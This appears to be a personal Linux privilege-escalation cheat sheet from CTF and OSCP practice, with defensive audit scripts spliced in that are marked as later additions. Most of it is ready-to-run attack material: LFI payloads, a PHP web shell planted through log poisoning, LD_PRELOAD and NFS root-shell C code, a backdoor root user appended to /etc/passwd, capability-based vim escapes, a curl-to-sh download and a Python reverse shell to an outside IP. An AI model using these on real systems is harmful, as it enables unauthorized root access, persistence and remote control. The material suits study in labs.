Automated Enumeration Tools


  • LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
  • LinEnum: https://github.com/rebootuser/LinEnum
  • LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester
  • Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration
  • Linux Priv Checker: https://github.com/linted/linuxprivchecker

  • https://bitvijays.github.io/LFC-VulnerableMachines.html#ctf-series-vulnerable-machines
  • https://blog.theshahzada.com/2021/01/linux-privilege-escalation.html
  • https://0xneel.medium.com/privilege-escalation-enumeration-checklist-2d995e9ddfe7
  • https://fieldraccoon.github.io/posts/Linuxprivesc/

  • OSCP https://www.blakejarvis.com/oscp/oscp-things-to-try-when-stuck

Running processes

lsof can bring back deleted files: https://www.linux.com/news/bring-back-deleted-files-lsof/

List open network files:

lsof -i -n

Reading /proc/<pid>/cmdline reveals the command line a running process was started with (/proc/self/cmdline is the reading process itself).

pspy (watch processes and cron jobs as an unprivileged user)

Exploits

  • DirtyCOW AddUser (Ubuntu <4.4/<3.13; Debian <4.7.8)
  • DirtyCOW Pokeball (Linux Kernel 2.6.22 < 3.9)
  • Mempodipper (Linux 2.6.39<3.2.2 Gentoo/Debian)
  • Full Nelson (Linux 2.6.31<2.6.37 RedHat/Debian)
  • Half Nelson (Linux Kernel 2.6.0<2.6.36.2)
  • Clown NewUser (Linux 3.0<3.3.5)
  • fasync_helper (Linux Kernel <2.6.28)
  • overlayfs (Linux 3.13.0<3.19)
  • pipe.c root(kit?) (Kernel 2.6.x (32 Bit only!))
  • PERF_EVENTS (Kernel 2.6.32-3.8.10)
  • CAN BCM Exploit (Kernel <2.6.36)
  • Cups local Exploit (Cups <1.1.17)

Important Commands


Generate a password hash

openssl passwd -1 -salt THM Password1
$1$THM$T5GbaVFIumCx94QUC3yLU1

List system capabilities

https://linux.die.net/man/7/capabilities

capsh --print
groups
id

Retrieve sudo version

sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"

Show OS version

cat /etc/*release
cat /proc/version
cat /etc/issue
uname -a

Run linpeas in one line

curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh

Is ssh running?

ss -antlp | grep sshd

Who is there?

w / pinky / finger
lastlog

LFI (local file inclusion) / RFI


https://labs.com/index.php?err=php://filter/resource=index.php
https://labs.com/index.php?err=filter/read=string.rot13/resource=/etc/passwd
https://labs.com/page.php?file=php://filter/convert.base64-encode/resource=/etc/passwd

Write PHP into a log file, then include it:

https://labs.com/login.php?err=/tmp/sess_vc4567al6pq7usm2cufmilkm45


Priv. exp.: Sudo


Summary steps for LD_PRELOAD

  1. Run sudo -l and check whether LD_PRELOAD is preserved (env_keep option)
  2. Write a simple C program and compile it as a shared object (.so) file
  3. Run a sudo-permitted program with LD_PRELOAD pointing to the .so file

The C code simply spawns a root shell and can be written as follows:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Runs when the shared object is loaded: unset LD_PRELOAD so the
   child shell does not load it again, then drop into a root shell. */
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

Compile it as a shared object and run a sudo-permitted program with it preloaded:

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
sudo LD_PRELOAD=/home/user/ldpreload/shell.so find
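A defender-side check for step 1, added here and not part of the original notes: it reads `sudo -l` output (or sudoers text) on stdin and reports every loader-controlling variable that `env_keep` preserves. The function names and the sample `sudo -l` output are assumptions.

```shell
# Added audit helper, not from the original notes: report loader-related
# environment variables that sudo preserves through env_keep. Reads
# `sudo -l` output or sudoers text on stdin, prints one variable per
# line, and returns 0 if anything was flagged (1 otherwise).
sudo_env_keep_risks() {
    awk '
    BEGIN { risky["LD_PRELOAD"] = 1; risky["LD_LIBRARY_PATH"] = 1; risky["LD_AUDIT"] = 1 }
    /env_keep/ {
        line = $0
        # Handle env_keep=VAR, env_keep+=VAR and the quoted "VAR1 VAR2" form,
        # several of which may share one line (sudo -l joins Defaults with commas).
        while (match(line, /env_keep[[:space:]]*\+?=[[:space:]]*("[^"]*"|[^",[:space:]]+)/)) {
            val  = substr(line, RSTART, RLENGTH)
            line = substr(line, RSTART + RLENGTH)
            sub(/^env_keep[[:space:]]*\+?=[[:space:]]*/, "", val)
            gsub(/"/, "", val)
            n = split(val, vars, /[[:space:]]+/)
            for (i = 1; i <= n; i++)
                if (vars[i] in risky) { print vars[i]; hit = 1 }
        }
    }
    END { exit hit ? 0 : 1 }'
}

# Constructed sample of `sudo -l` output (not captured from a real host).
sample_sudo_l() {
    printf '%s\n' \
        'Matching Defaults entries for karen on this host:' \
        '    env_reset, mail_badpass, env_keep+=LD_PRELOAD, env_keep+="LD_LIBRARY_PATH HOME"' \
        '' \
        'User karen may run the following commands on this host:' \
        '    (root) NOPASSWD: /usr/bin/find'
}

sample_sudo_l | sudo_env_keep_risks || echo "sudo keeps no loader variables"
```

On a real host pipe `sudo -l` (or the sudoers files) into `sudo_env_keep_risks`; anything it prints should be removed from env_keep.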

Priv. exp.: SUID


  • SUID on GtfoBin https://gtfobins.github.io/#+suid

Find SUID/SGID binaries

find / \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null

Add backdoor user

  1. Check the permissions of passwd and shadow
    ls -ail /etc/shadow /etc/passwd

  2. Append the backdoor user line (hash generated above with openssl passwd) to /etc/passwd
    backdoor:$1$THM$T5GbaVFIumCx94QUC3yLU1:0:0:root:/root:/bin/bash

  3. Switch to the new backdoor account
    su backdoor  #pass: Password1


Priv. exp.: Capabilities


List enabled capabilities

We can use getcap:

$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep

GTFObins has a good list of binaries that can be leveraged for privilege escalation if we find any set capabilities.

We notice that vim can be used with the following command and payload:

$ ls -l /home/karen/vim
-rwxr-xr-x 1 root root 2906824 Jun 18 11:46 /home/karen/vim
$ ls -l /usr/bin/vim
lrwxrwxrwx 1 root root 21 Oct 26  2020 /usr/bin/vim -> /etc/alternatives/vim

Either binary gives a root shell (cap_setuid lets the embedded Python interpreter call setuid(0)):

./view -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
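An audit helper for the getcap listing above, added here and not part of the original notes: it reads `getcap -r /` output on stdin and flags identity-changing or DAC-bypassing capabilities, plus any capability-bearing file outside the system directories (the user-owned vim copy in /home is exactly that case). The function names and sample listing are assumptions; both the older `file = caps+ep` and newer `file caps=ep` output formats are handled.

```shell
# Added audit helper, not from the original notes: reads `getcap -r /`
# output on stdin and flags grants that let a binary change identity or
# bypass DAC, plus any capability-bearing file outside the usual system
# directories. Prints "<file> <finding>" per line; returns 0 if anything
# was flagged, 1 otherwise.
risky_caps() {
    awk '
    BEGIN {
        n = split("cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner", r, " ")
        for (i = 1; i <= n; i++) risky[r[i]] = 1
    }
    NF >= 2 {
        file = $1
        caps = $NF                      # "a,b+ep" (older libcap) or "a,b=ep" (newer libcap)
        sub(/[+=][eip]*$/, "", caps)    # drop the effective/permitted/inheritable flags
        m = split(caps, c, ",")
        for (i = 1; i <= m; i++)
            if (c[i] in risky) { print file, c[i]; hit = 1 }
        if (file !~ /^\/(usr|bin|sbin|lib)/) { print file, "outside-system-dirs"; hit = 1 }
    }
    END { exit hit ? 0 : 1 }'
}

# Constructed sample in both getcap output formats (not from a real host).
sample_getcap() {
    printf '%s\n' \
        '/usr/bin/ping = cap_net_raw+ep' \
        '/usr/bin/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep' \
        '/home/karen/vim = cap_setuid+ep' \
        '/usr/bin/python3.8 cap_setuid=ep'
}

sample_getcap | risky_caps || echo "no risky capabilities found"
```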

Active ports


List the active ports

((netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null

Priv. exp.: Crontab


$ cat /etc/crontab

* * * * *  root /script.sh

Priv. exp.: $PATH


  1. Which folders are in $PATH?
  2. Does your current user have write privileges for any of these folders?
    find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
    
  3. Can you modify $PATH?
  4. Is there a script/application you can start that will be affected by this vulnerability?
    export PATH=/tmp:$PATH
    
$ cd /tmp
$ echo "/bin/bash" > murdoch
$ chmod 777 murdoch 
$ ls -l murdoch
-rwxrwxrwx 1 karen karen 10 Nov 19 23:01 murdoch
$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
$ export PATH=/tmp:$PATH
$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
$ ls -l /tmp/murdoch
-rwxrwxrwx 1 karen karen 10 Nov 19 23:01 /tmp/murdoch
/tmp$ cat rootme.c
#include <unistd.h>

/* Payload binary: when a root process runs it through the hijacked
   $PATH entry, set uid/gid 0 and exec a shell. */
int main(void)
{
    setgid(0);
    setuid(0);
    execl("/bin/sh", "sh", (char *)NULL);
    return 0;
}
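The PATH checks in steps 1 to 4 as one audit function, added here and not part of the original notes: it walks a PATH value entry by entry and prints the entries that would let a planted binary be picked up (empty or relative entries, world-writable or user-writable directories, missing directories). The function name and the scratch-directory demo are assumptions; run it as the user whose PATH is being audited.

```shell
# Added audit helper, not from the original notes: walk a PATH value
# entry by entry and print those an unprivileged user could abuse to get
# a planted binary executed: empty or relative entries (resolved against
# the current directory), world-writable directories, directories writable
# by the calling user, and missing directories (creatable if the parent is
# writable). Returns 0 if anything was printed, 1 otherwise.
path_risks() {
    rest="$1:"          # trailing ':' so a final (possibly empty) field is seen
    hit=1
    while [ -n "$rest" ]; do
        dir="${rest%%:*}"
        rest="${rest#*:}"
        case "$dir" in
            "")  echo "empty-entry (means the current directory)"; hit=0 ;;
            /*)
                if [ ! -d "$dir" ]; then
                    echo "missing $dir"; hit=0
                elif [ -n "$(find -H "$dir" -prune -perm -0002 2>/dev/null)" ]; then
                    echo "world-writable $dir"; hit=0
                elif [ -w "$dir" ]; then
                    echo "writable-by-$(id -un) $dir"; hit=0
                fi ;;
            *)   echo "relative-entry $dir"; hit=0 ;;
        esac
    done
    return $hit
}

# Demonstration on a constructed PATH: a world-writable scratch directory
# placed in front of the system directories, as in the session above.
demo=$(mktemp -d) && chmod 777 "$demo"
path_risks "$demo:.:/usr/bin:/bin" || echo "nothing flagged"
rmdir "$demo"
```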

Priv. exp.: Contaminating log files


nc -nv 10.11.0.22 80
(UNKNOWN) [10.11.0.22] 80 (http) open
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>

Then include the log file through the LFI.


Priv. exp.: NFS


Requires the no_root_squash export option.

$ cat /etc/exports
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
showmount -e 10.10.246.35
Export list for 10.10.246.35:
/tmp                      *
# mkdir /tmp/test
/tmp# mount -o rw 10.10.246.35:/tmp /tmp/test
/tmp/backup# cat exploit.c
#include <stdlib.h>
#include <unistd.h>

int main()
{
	setuid(0);
	setgid(0);
	system("/bin/bash");
	return 0;
}

/tmp/test# gcc exploit.c -o exploit -w
/tmp/test# sudo chown root.root exploit
/tmp/test# sudo chmod +s exploit
/tmp/test# ls -al exploit
-rwxr-xr-x 1 root root 8392 Nov 20 00:18 exploit

Alternatively, copy a shell into the share and set the SUID bit: cp /bin/bash /tmp/test/ and then chmod +s /tmp/test/bash


If you find some directory that is configured as no_root_squash/no_all_squash you may be able to privesc.

# Attacker, as root user

mkdir <DIRECTORY>
mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
cd <DIRECTORY>
echo 'int main(void){setreuid(0,0); system("/bin/bash"); return 0;}' > pwn.c
gcc pwn.c -o pwn
chmod +s pwn

# Victim

cd <SHARE>
./pwn # Root shell
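A server-side check for the export option this section depends on, added here and not part of the original notes: it parses /etc/exports text on stdin and prints every client entry that disables root squashing or allows unprivileged source ports. The function names and the sample exports are assumptions (the first sample line mirrors the one shown above).

```shell
# Added audit helper, not from the original notes: parse /etc/exports
# text on stdin and print "<path> <client> <option>" for every client
# entry that disables root squashing (no_root_squash / no_all_squash)
# or accepts unprivileged source ports (insecure). Entries without an
# option list get the defaults, which squash root. Returns 0 if flagged.
risky_exports() {
    awk '
    /^[[:space:]]*#/ || NF == 0 { next }
    {
        path = $1
        for (i = 2; i <= NF; i++) {
            if ($i !~ /\(/) continue                 # "host" alone: default options
            client = $i; sub(/\(.*/, "", client)
            opts = $i;   sub(/^[^(]*\(/, "", opts); sub(/\).*$/, "", opts)
            if (client == "") client = "*"
            n = split(opts, o, ",")
            for (j = 1; j <= n; j++)
                if (o[j] == "no_root_squash" || o[j] == "no_all_squash" || o[j] == "insecure") {
                    print path, client, o[j]; hit = 1
                }
        }
    }
    END { exit hit ? 0 : 1 }'
}

# Constructed /etc/exports sample (not from a real server).
sample_exports() {
    printf '%s\n' \
        '# /etc/exports' \
        '/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)' \
        '/srv/data 10.10.0.0/24(rw,sync,root_squash) 10.10.1.5(ro)' \
        '/srv/pub *'
}

sample_exports | risky_exports || echo "no risky exports"
```

On the NFS server run `risky_exports < /etc/exports`; every line it prints names an export where a client root user (or, with insecure, any client user on a high port) keeps full privileges.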

Stabilize shell


Listener that sends its own terminal size to the remote shell, so rows and columns need not be typed there:

stty raw -echo; (stty size; cat) | nc -lvnp 21

Show the current terminal settings: stty -a

nc -nvlp 4444


python3 -c 'import pty; pty.spawn("/bin/bash")'

python2 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo; fg
reset
stty rows 19 columns 126; export SHELL=bash; export TERM=xterm-256color; alias ll='clear; ls -lsaht --color=auto'
stty rows 26 columns 118; export SHELL=bash; export TERM=xterm; alias ll='clear; ls -lsaht --color=auto'

Without Python, using script:

script /dev/null -c bash
Ctrl-Z
stty raw -echo; fg
reset
stty rows 25 columns 240; export SHELL=bash; export TERM=xterm-256color; alias ll='clear; ls -lsaht --color=auto'
stty rows 25 columns 240; export SHELL=bash; export TERM=xterm; alias ll='clear; ls -lsaht --color=auto'

Another version:

/usr/bin/script -qc /bin/bash /dev/null

One-liner (Python PTY reverse shell):

export RHOST="192.168.49.234";export RPORT=80;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

Persistence SSH


ssh-keygen -f dasith
cat dasith.pub
chmod 600 dasith

Vi config


syntax on
set number
set mouse-=a